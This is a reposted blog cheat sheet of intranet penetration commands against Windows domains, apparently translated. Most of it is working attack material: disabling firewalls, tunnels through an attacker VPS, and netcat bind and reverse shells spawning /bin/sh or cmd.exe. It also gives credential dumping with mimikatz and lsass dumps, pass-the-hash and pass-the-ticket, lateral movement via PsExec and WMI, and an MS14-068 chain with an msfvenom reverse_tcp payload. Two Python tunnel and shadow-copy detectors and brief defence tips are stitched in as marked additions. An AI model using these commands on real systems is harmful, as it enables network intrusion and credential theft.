
Intranet penetration concise notes

2022-06-10 00:51:00 nigo134

Chapter 2 - Intranet information collection

2.1 =================  Workgroup manual information collection  ==================
1. Query network configuration information 
    ipconfig /all

2. Query operating system and software information 
    systeminfo
     View the system architecture 
    echo %PROCESSOR_ARCHITECTURE%
     Check the installed software, version and path 
    wmic product get name,version

3. Query local services 
    wmic service list brief

4. Query process list 
    tasklist /v
     View details 
    wmic process list brief
    
5. Check the startup program information 
    wmic startup get command,caption
6. View scheduled tasks 
    schtasks /query /fo LIST /v
7. Check the boot time of the host 
    net statistics workstation
8. Query user list 
    net user
     Get local administrator information 
    net localgroup administrators
     View logged-on users 
    query user || qwinsta
9. List sessions 
    net session
10. View listening ports and connections 
    netstat -ano
11. View installed patches 
    systeminfo
    wmic qfe get Caption,Description,HotFixID,InstalledOn
12. Query local share list 
    net share
    wmic share get name,path,status
13. Query routing tables and ARP Cache table 
    route print
    arp -a
14. Query firewall 
(1) Turn off the firewall 
    # Windows Server 2003 and earlier 
    netsh firewall set opmode disable
    # Windows Server 2003 and later 
    netsh advfirewall set allprofiles state off
(2) View firewall configuration 
    netsh firewall show config
(3) Modify the firewall configuration 
    Windows Server 2003 and earlier: allow the specified program to connect. The command is as follows.
    netsh firewall add allowedprogram c:\nc.exe "allow nc" enable
 
    Windows Server 2003 and later versions are handled as follows.
     Allow the specified program to make inbound connections:
    netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"
    
     Allow the specified program to make outbound connections:
    netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C:\nc.exe"
    
     Allow port 3389 through the firewall:
    netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
    
(4) Custom firewall log location 
    netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"

15. View the proxy configuration 
    reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

16. Query and enable the remote connection service 
(1) View the remote connection port 
 In cmd, query the registry with the command below. The returned PortNumber is 0xd3d, which converts to 3389.
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
 
(2) Enable port 3389 on Windows Server 2003 
wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
 
(3) Enable port 3389 on Windows Server 2008 and Windows Server 2012 
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
 
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
 
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

2.2 =============  Automatic information collection  ================
# Information collection with Empire 
(Empire: W12MRC5H) > usemodule situational_awareness/host/winenum
(Empire: powershell/situational_awareness/host/winenum) > execute


2.3 ============== Query current permissions =================
 View current permissions 
whoami
 Get the domain SID 
whoami /all
 Query the details of a specified account 
net user XXX /domain

2.4 =============== Determine whether a domain exists ==================
1. Use the ipconfig command 
ipconfig /all    # shows the gateway IP address, the DNS server IP address, whether the local address is on the same segment as the DNS server, the domain name, etc.
nslookup hello.testlab    # resolve the domain name to an IP address with nslookup; compare the resolved IP to determine whether the domain controller and the DNS server are the same host
2. View system details 
systeminfo    # "Domain" shows the domain name and "Logon Server" shows the domain controller. If "Domain" shows WORKGROUP, the current host is not in a domain. Here the domain is hello.testlab.
3. Query the current logon domain and logged-on user 
net config workstation    # "Workstation domain DNS Name" shows the domain name (WORKGROUP means a non-domain environment). "Logon domain" shows whether the current user is a domain user or a local user; here the user is logged in locally.

4. Determine the primary domain 
net time /domain    # determines the primary domain; the domain controller usually also acts as the time server.
1. A domain exists but the current user is not a domain user: the output is "System error 5 has occurred".
2. A domain exists and the current user is a domain user: the output is "Current time at DC.hello.testlab is xxx".
3. The current network is a workgroup with no domain: the output is "Could not find the domain controller for domain xxx".

2.5 ================== Probe live hosts in the domain =============
1. Use NetBIOS to quickly probe the intranet 
    nbtscan 192.168.1.0/24
    nbtscan.exe 192.168.1.0/24    
2. Use the ICMP protocol to quickly probe the intranet 
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

2.6 ==================== Scan ports in the domain =================

1. Probe host ports 
telnet DC 22
telnet DC 1443

2. S scanner 
S.exe TCP 192.168.1.1 192.168.1.254 445,3389,1433,7001,1099,8080,80,22,23,21,25,110,3306,5432,1521,6379,2049,111 256 /Banner /save
# S is an early, fairly fast port scanner, especially suited to Windows Server 2003 and earlier, and supports scanning large network segments 

3.Metasploit  Port scanning 
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.2
RHOSTS => 192.168.1.2
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 1-1024
PORTS => 1-1024
msf5 auxiliary(scanner/portscan/tcp) > set THREADS 100
THREADS => 100
msf5 auxiliary(scanner/portscan/tcp) > run

2.7=================== Collect basic information in the domain =================
1. Query domain 
net view /domain

2. Query all computers in the domain 
net view /domain:HACKE

3. Query the user group list 
net group /domain

Domain Admins: domain administrators group.
Domain Computers: machines joined to the domain.
Domain Controllers: domain controllers.
Domain Guest: domain guests group, low privilege.
Domain Users: domain users.
Enterprise Admins: enterprise administrators.
 By default, Domain Admins and Enterprise Admins have full control over all domain controllers in the domain.

4. Query the list of computers in the domain 
net group "domain computers" /domain

5. Get domain password policy information 
net accounts /domain    # shows the domain password policy: password length, lockout threshold, etc.

6. Get trust information 
nltest /domain_trusts


2.8 =====================  Find the domain controllers  ==================
1. View the machine names of the domain controllers 
nltest /DCLIST:hacke
2. View the host name of the domain controller (dc.hacke.testlab)
nslookup -type=SRV _ldap._tcp
3. View the current time 
net time /domain    # the time server is usually the primary domain controller 
4. View the Domain Controllers group 
net group "Domain Controllers" /domain
netdom query pdc    # in practice there are usually two or more domain controllers, so that if the primary domain controller fails, a standby domain controller keeps authentication for intra-domain services working.

2.9 ================  Get user and administrator information in the domain  =================
1. Query all domain users 
net user /domain
2. Get user details in the domain 
wmic useraccount get /all
3. View existing users 
dsquery user
 
dsquery computer    - find computers in the directory.
dsquery contact     - find contacts in the directory.
dsquery subnet      - find subnets in the directory.
dsquery group       - find groups in the directory.
dsquery ou          - find organizational units in the directory.
dsquery site        - find sites in the directory.
dsquery server      - find AD DC/LDS instances in the directory.
dsquery user        - find users in the directory.
dsquery quota       - find quota specifications in the directory.
dsquery partition   - find partitions in the directory.
dsquery *           - general-purpose LDAP query to find any object in the directory.

4. Query the users of the built-in local administrator group in the domain 
net localgroup administrators /domain

2.9.2 ===================  Query domain administrator groups  ==============
1. Query domain administrators 
net group "domain admins" /domain
2. Query enterprise administrators 
net group "Enterprise Admins" /domain

2.10 ===================  Locate domain administrators ( tools ) ================
psloggedon.exe
pveFindADUser.exe
netview.exe
Nmap NSE scripts 
PowerView
Empire's user_hunter module 

Chapter 4 - Tunnels

 Check intranet connectivity:
ICMP protocol 
ping

TCP protocol:
linux: netcat (nc)    # nc <ip address> <port>

HTTP protocol:
curl www.baidu.com
(on Windows the curl command must be installed)

DNS protocol:
windows: nslookup www.baidu.com vps-ip
linux: dig @vps-ip www.baidu.com

ICMP tunnel 
1. icmpsh:
vps
    git clone https://github.com/inquisb/icmpsh.git
    sysctl -w net.ipv4.icmp_echo_ignore_all=1     # stop the system from answering ping itself; set back to 0 after use
    cd icmpsh
    pip install impacket
    ./icmpsh_m.py 192.168.0.11 192.168.0.8    # 192.168.0.11 is the attacker's local IP address, 192.168.0.8 is the target's public IP address 
    # you can ping the VPS IP and run tcpdump icmp to obtain the target machine's public IP

 Target machine 
	icmpsh.exe -t 192.168.0.11 -d 500 -b 30 -s 128

2. pingtunnel
# On the Web server 192.168.1.4 run:
ptunnel -x shuteer
# On the VPS 192.168.1.10 run:
ptunnel -p 192.168.1.4 -lp 1080 -da 1.1.1.10 -dp 3389 -x shuteer

-x: specify the authentication password for the ICMP tunnel connection.
-lp: specify the local TCP listening port.
-da: specify the IP address of the target machine to forward to.
-dp: specify the TCP port of the target machine to forward to.
-p: specify the IP address of the machine at the other end of the ICMP tunnel.

 The commands above mean: when port 1080 on the attacker's VPS (192.168.1.10) is accessed, data for port 3389 on the database server 1.1.1.10 is encapsulated in the ICMP tunnel and relayed through the Web server 192.168.1.4, which acts as the ICMP tunnel gateway.


3. Defending against ICMP tunnel attacks 
a. Count the ICMP packets coming from the same source: a normal ping sends at most two packets per second, whereas an ICMP tunnel produces thousands of ICMP packets in a very short time.
b. Watch for ICMP packets whose payload is larger than 64 bit.
c. Look for ICMP packets whose reply payload differs from the payload of the corresponding request.
d. Check the protocol tag of the ICMP packets. For example, icmptunnel adds a "TUNL" marker to every ICMP payload to identify the tunnel.
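The four heuristics above as a small detector, added here as an example and not part of the original notes: it parses raw ICMP echo headers and reports a source when the per-second rate, the payload size, a request/reply payload mismatch or the TUNL marker trips. The 64-byte payload threshold, the documentation-range addresses and the sample capture are assumptions constructed for the example.

```python
import struct
from collections import defaultdict, deque

ECHO_REPLY, ECHO_REQUEST = 0, 8
MAX_PACKETS_PER_SECOND = 2      # from the notes: a normal ping sends at most two packets per second
MAX_PAYLOAD_BYTES = 64          # assumed threshold; a default Linux ping payload is 56 bytes
TUNNEL_MARKER = b"TUNL"         # marker icmptunnel puts in every payload, as the notes describe

def build_icmp(icmp_type, ident, seq, payload):
    """Build a raw ICMP echo packet (checksum left zero; it is irrelevant for detection)."""
    return struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload

def parse_icmp(raw):
    """Parse the 8-byte ICMP echo header; everything after it is payload."""
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    return {"type": icmp_type, "id": ident, "seq": seq, "payload": raw[8:]}

def detect_icmp_tunnel(packets):
    """packets: iterable of (timestamp_seconds, source_ip, raw_icmp_bytes) in capture order.
    Returns a sorted list of (source_ip, reason) findings for heuristics a-d from the notes."""
    findings = set()
    recent = defaultdict(deque)       # source_ip -> timestamps seen within the last second
    pending = {}                      # (id, seq) -> (request source, request payload)
    for ts, src, raw in packets:
        pkt = parse_icmp(raw)
        # a. packet rate per source within a one-second sliding window
        window = recent[src]
        window.append(ts)
        while ts - window[0] > 1.0:
            window.popleft()
        if len(window) > MAX_PACKETS_PER_SECOND:
            findings.add((src, "rate"))
        # b. oversized payload
        if len(pkt["payload"]) > MAX_PAYLOAD_BYTES:
            findings.add((src, "payload_size"))
        # d. known tunnel marker inside the payload
        if TUNNEL_MARKER in pkt["payload"]:
            findings.add((src, "marker"))
        # c. a reply must echo the request payload; pair request and reply by (id, seq)
        key = (pkt["id"], pkt["seq"])
        if pkt["type"] == ECHO_REQUEST:
            pending[key] = (src, pkt["payload"])
        elif pkt["type"] == ECHO_REPLY and key in pending:
            req_src, req_payload = pending.pop(key)
            if req_payload != pkt["payload"]:
                findings.add((req_src, "payload_mismatch"))
    return sorted(findings)

def build_sample_capture():
    """Constructed sample traffic, not a real capture: a benign ping from 10.0.0.5
    to 192.0.2.1, then a tunnel-like burst between 10.0.0.9 and 203.0.113.7."""
    pkts = []
    benign = bytes(range(56))                            # 56-byte payload like a Linux ping
    for i in range(3):
        pkts.append((float(i), "10.0.0.5", build_icmp(ECHO_REQUEST, 0x1234, i, benign)))
        pkts.append((i + 0.01, "192.0.2.1", build_icmp(ECHO_REPLY, 0x1234, i, benign)))
    for i in range(10):
        t = 5.0 + i * 0.01                               # ten packets within 0.1 s
        up = TUNNEL_MARKER + bytes([i]) * 196            # tunnelled data going out
        down = TUNNEL_MARKER + bytes([0xFF - i]) * 196   # different data coming back
        pkts.append((t, "10.0.0.9", build_icmp(ECHO_REQUEST, 0x4242, i, up)))
        pkts.append((t + 0.005, "203.0.113.7", build_icmp(ECHO_REPLY, 0x4242, i, down)))
    return pkts

if __name__ == "__main__":
    for src, reason in detect_icmp_tunnel(build_sample_capture()):
        print(f"{src}: {reason}")
```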



 Transport layer tunneling 
1. lcx port forwarding 
a. Run the following command on the target machine to forward all data from the target's port 3389 to port 4444 on the public VPS.
lcx.exe -slave <public host IP address> 4444 127.0.0.1 3389
b. Run the following command on the VPS to forward all data received on port 4444 to local port 5555.
lcx.exe -listen 4444 5555

2. netcat
-d: run detached in the background.
-c: redirect a program over the connection (execute via a shell).
-g <gateway>: set loose source-route gateway hops, up to 8.
-G <pointer>: set the source-route pointer, a multiple of 4.
-h: online help.
-i <seconds>: set the delay between lines sent and between ports scanned.
-l: listen mode, waiting for inbound connections.
-n: use IP addresses only, without DNS lookups.
-o <file>: write a hex dump of the transmitted data to the given file.
-p <port>: set the local port to use.
-r: randomize local and remote ports.
-s <source address>: set the source IP address of packets sent by the local host.
-u: use UDP.
-v: verbose output.
-w <seconds>: set the connection timeout.
-z: zero-I/O mode, used only when scanning ports.

1. Grab Banner Information 
    nc -nv 192.168.123.103 21
2. Connect to remote host 
    nc -nvv 192.168.11.135 80
3. Port scanning 
    nc -v 192.168.11.138 80
    nc -v -z 192.168.11.138 20-1024
4. Port listening 
    nc -l -p 9999
5. File transfer 
    Host A: nc -lp 333 > 1.txt
    Host B: nc -vn 192.168.1.4 333 < test.txt -q 1
6. Simple chat 
    A: nc -l -p 888
    B: nc -vn 192.168.1.4 888

7. Obtain a shell 
a. bind shell
 Victim:
    nc -lvp 4444 -e /bin/sh                     //Linux
    nc -lvp 4444 -e c:\windows\system32\cmd.exe //Windows
 Attacker:
    nc 192.168.1.11 4444
b. reverse shell
 Victim:
    nc 192.168.11.144 9999 -e /bin/sh                       //Linux
    nc 192.168.11.144 9999 -e c:\windows\system32\cmd.exe   //Windows
 Attacker:
    nc -lvp 9999

8. Intranet proxy 
 On the VPS run:
    nc -lvp 3333
 Web server:
    nc -v 192.168.1.4 3333 -c "nc -v 1.1.1.200 3333"
 Database server:
    nc -lvp 3333 -e /bin/sh


3.4 =========  Application layer tunneling (linux/unix) =========
1. SSH protocol 
 Commonly used SSH options:
    -C: compress the transmission to increase speed.
    -f: send SSH to the background so it does not occupy the current shell.
    -N: do not execute a remote command (the connection is established, but no session is visible).
    -g: allow remote hosts to connect to locally forwarded ports.
    -L: local port forwarding.
    -R: remote port forwarding.
    -D: dynamic forwarding (SOCKS proxy).
    -p: specify the SSH port.

1. Port forwarding 
 Local forwarding 
    ssh -CfNg -L 1153:1.1.1.10:3389 [email protected]    # 1153 = VPS port, 1.1.1.10 = target host, 3389 = target port, [email protected] = jump host
 Remote forwarding 
    ssh -CfNg -R 3307:1.1.1.10:3389 [email protected]    # 3307 = VPS port, 1.1.1.10 = target host, 3389 = target port
 Dynamic forwarding (SOCKS proxy)
    ssh -CfNg -D 7000 [email protected]    # run on the VPS; set the browser proxy to 127.0.0.1:7000 to reach the intranet 

2. Defending against SSH tunnel attacks 
The main reason SSH tunnels can be abused by attackers is insufficient access control on the system. Configuring an SSH remote-management whitelist, restricting in the ACL which IP addresses may connect over SSH, and moving the system fully to out-of-band management avoid this problem.
 If there are not enough resources to build an out-of-band management network, the intranet should at least enforce address restrictions and bidirectional access-control policies for SSH remote logins (outside to inside, and inside to outside).

3.5 =============== SOCKS proxy  ==============
EarthWorm (all OSes)
1. Forward SOCKS5 proxy (the target has a public IP)
    ew -s ssocksd -l 888
2. Reverse SOCKS5 proxy 
    VPS:        ew -s rcsocks -l 1008 -e 888
    web_server: ew -s rssocks -d 139.1.1.113 -e 888
 Set 139.1.1.113:1008 as the proxy to use web_server as the proxy server 
3. Two-level network environment (a)
     Intranet machine B: ew -s ssocksd -l 888
     Boundary server A:  ew -s lcx_tran -l 1080 -f <A host public IP> -g 888    # forward proxy requests received on port 1080 to port 888 on intranet machine B 
4. Two-level network environment (b)
Host A has no public IP and cannot reach the intranet. Host B can reach the intranet but cannot reach the Internet.
    VPS:    ew -s lcx_listen -l 1080 -e 888    # add a relay tunnel on the public VPS; requests received on port 1080 are forwarded to port 888 
     Host B: ew -s ssocksd -l 999    # start a SOCKS proxy on port 999 in ssocksd mode 
     Host A: ew -s lcx_slave -d vpsip -e 888 -f <A host IP> -g 999     # on host A, use lcx_slave to connect port 888 on the VPS with port 999 on host B 
5. Three-level network environment 
# On the public VPS, forward proxy requests received on port 1080 to port 888.
	ew -s rcsocks -l 1080 -e 888
# On host A, connect port 888 on the public VPS with port 999 on host B.
	ew -s lcx_slave -d 139.*.*.113 -e 888 -f 10.48.128.12 -g 999
# On host B, forward proxy requests received on port 999 to port 777.
	ew -s lcx_listen -l 999 -e 777
# On host C, start the SOCKS5 service and bounce it back to port 777 on host B.
	ew -s rssocks -d 10.48.128.12 -e 777

Chapter 5 - Lateral movement

 Establish an IPC connection 
	net use \\192.168.1.106\ipc$ "ning" /user:ning
	net use f: \\192.168.1.1\c$ "@dc123456" /user:"Ning"  ( maps the other party's C drive to a local drive letter, here f:; other drives work the same way )
 View connections 
	net use
dir command 
	dir \\192.168.43.247\c$
tasklist command 
	tasklist /S 192.168.43.247 /U ning /P ning

 View the target's time 
	net time \\192.168.1.102

copy command 
	copy test.bat \\192.168.1.102\c$



 Create a scheduled task 	
	 Target host <= Windows Server 2008
	at \\192.168.1.102 16:45 c:\test.bat

	 Target host >= Windows Server 2012
	schtasks /create /s 192.168.43.247 /tn test /sc onstart /tr c:\test.bat /ru system /f
 Run the task 
	schtasks /run /s 192.168.43.247 /i /tn "test"


 Delete the ipc$ connection 
	net use \\192.168.43.3\ipc$ /del /y

-------- Dump plaintext passwords or hashes ( plaintext only on <= 2008)
1. Export hashes from the sam and system files 
 Export the sam and system hives 
	reg save hklm\sam sam.hive
	reg save hklm\system system.hive

 Export the hashes with mimikatz 
	lsadump::sam /sam:sam.hive /system:system.hive

 Enable WDigest credential caching with reg add 
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f


2. Read an lsass.dmp file offline with mimikatz 
 Target machine:
	Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz:
	sekurlsa::minidump lsass.DMP
	sekurlsa::logonPasswords full
--------------------------------------- windows server 2012
 * Username : Administrator
         * Domain   : WIN-DRORIGCSR3A
         * NTLM     : 9bb8843ea315134b0b6be65b549a9235
         * SHA1     : 151550c9d987e11c9dae2738e03dbcc855c5d4f
---------------------------------------


-------------- mimikatz pass-the-hash 
	privilege::debug
	sekurlsa::pth /user:Ning /domain:hacke.testlab /ntlm:0ef91438203428ca361c8ca653ef101a


----------- mimikatz pass-the-ticket 
privilege::debug
sekurlsa::tickets /export    # export tickets 
kerberos::purge              # delete all tickets 

kerberos::ptt "<path>"       # inject the ticket into memory 

----------- kekeo pass-the-ticket 
 Generate a ticket:
	kekeo "tgt::ask /user:administrator /domain:hacke.testlab /ntlm:*****"
 Clear the tickets in memory:
	kerberos::purge
	from cmd: klist purge
 Import the ticket into memory:
	kerberos::ptt [email protected][email protected]


------------- PsExec
 With an ipc$ connection established:
	PsExec.exe -accepteula \\192.168.43.2 -s cmd.exe


------------- WMI
wmic /node:192.168.43.2 /user:administrator /password:admin process call create "cmd.exe /c ipconfig >ip.txt"

 View the output with type:
	type \\192.168.43.3\C$\ip.txt
	

Chapter 6 - Domain controller penetration

 Monitor volume shadow copy service usage 

	 By monitoring the usage of the volume shadow copy service, some malicious operations by an attacker can be discovered in time.
	 Monitor the volume shadow copy service and any suspicious operations involving the Active Directory database file (ntds.dit).
	 Monitor suspicious instances of System Event ID 7036 (the sign that the volume shadow copy service has entered the running state) and events creating the vssvc.exe process.
	 Monitor the creation of dkshndko.exe and related child processes.
	 Monitor diskshadow.exe instance-creation events on client devices. Unless the business requires it, diskshadow.exe should not appear on a Windows system; if found, it should be deleted immediately.
	 Monitor newly appearing logical drive mapping events through the logs.
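The monitoring rules above turned into checks over Windows event records, added here as an example and not from the original notes: the field names follow the real System 7036 and Security 4688 events, while the sample records are constructed for the example and are not real logs.

```python
import re

# Images the notes single out: vssvc.exe is the VSS service process,
# diskshadow.exe should not normally appear on a client at all.
VSS_SERVICE_NAMES = {"volume shadow copy", "vss"}    # display name / service name of the VSS service
NTDS_PATTERN = re.compile(r"ntds\.dit", re.IGNORECASE)

def image_name(path):
    """Return the lower-cased file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def check_event(event):
    """Apply the monitoring rules from the notes to one event record.
    Records are flat dicts using the Windows event field names
    (System 7036: param1/param2; Security 4688: NewProcessName, CommandLine, ParentProcessName).
    Returns a finding string, or None if the event is not suspicious."""
    channel, event_id = event.get("Channel"), event.get("EventID")
    if channel == "System" and event_id == 7036:
        # 7036: a service changed state; param1 is the service, param2 the new state
        service, state = event.get("param1", "").lower(), event.get("param2", "").lower()
        if service in VSS_SERVICE_NAMES and state == "running":
            return "volume shadow copy service entered the running state"
        return None
    if channel == "Security" and event_id == 4688:
        image = image_name(event.get("NewProcessName", ""))
        parent = image_name(event.get("ParentProcessName", ""))
        cmdline = event.get("CommandLine", "")
        if image == "diskshadow.exe":
            return "diskshadow.exe created (should not exist on a client system)"
        if image == "vssvc.exe":
            return "vssvc.exe process created"
        if parent == "diskshadow.exe":
            return f"child process {image} spawned by diskshadow.exe"
        if NTDS_PATTERN.search(cmdline):
            return f"{image} command line references ntds.dit"
    return None

def scan_events(events):
    """Run check_event over a sequence of records; returns [(index, finding), ...]."""
    return [(i, f) for i, e in enumerate(events) if (f := check_event(e))]

# Constructed sample records (not real logs); the values mimic what the real events carry.
SAMPLE_EVENTS = [
    {"Channel": "System", "EventID": 7036, "param1": "Windows Update", "param2": "running"},
    {"Channel": "System", "EventID": 7036, "param1": "Volume Shadow Copy", "param2": "running"},
    {"Channel": "Security", "EventID": 4688, "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"Channel": "Security", "EventID": 4688, "NewProcessName": r"C:\Windows\System32\VSSVC.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe", "CommandLine": "VSSVC.exe"},
    {"Channel": "Security", "EventID": 4688, "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe", "CommandLine": "diskshadow.exe"},
    {"Channel": "Security", "EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\diskshadow.exe", "CommandLine": "cmd.exe /c whoami"},
    {"Channel": "Security", "EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c copy C:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit"},
]

if __name__ == "__main__":
    for index, finding in scan_events(SAMPLE_EVENTS):
        print(f"event {index}: {finding}")
```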



MS14-068 attack process 
1. Test in Metasploit 
    use auxiliary/admin/kerberos/ms14_068_kerberos_checksum 
    
	 Set the parameters 
	DOMAIN: the domain name.
	PASSWORD: the password of the authorized user.
	USER: the authorized user.
	USER_SID: the SID of the authorized user.

    exploit

 After filling in all the information and entering the "exploit" command, the file 20180715230259_default_172.16.86.130_windows.kerberos_839172.bin is generated in the /root/.msf4/loot directory, as shown in Figure 6-59.


2. Format conversion 
    msf cannot import the bin file; convert it with mimikatz 
    kerberos::clist ".......bin" /export

3. Generate a reverse shell with msfvenom

	msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.5 LPORT=7777 -f exe > shell.exe

4. Set up the msf listener 
	use exploit/multi/handler
	exploit
5. Import the ticket into the session 
    getuid     # view privileges 
    load kiwi 
    kerberos_ticket_use /tmp/...kirbi    # import the ticket 
    background
    
6. Test with the high-privilege ticket 
    use exploit/windows/local/current_user_psexec 
    set payload windows/meterpreter/reverse_tcp
    set TECHNIQUE PSH
    set RHOSTS win2008.hello.com
    set lhost 1.1.1.5
    set session 1
    exploit 

 

 
6.6.5 Precautions 

     Enable the Windows Update feature and apply updates automatically.
     Manually download the patch package to fix it; Microsoft has released a patch for this vulnerability.
     Control the accounts in the domain: forbid weak passwords and change passwords promptly and regularly.
     Install anti-virus software on servers and keep the virus database updated.

Copyright notice
This article was written by [nigo134]; when reposting, please include the original link. Thank you.
https://yzsam.com/2022/161/202206100023570068.html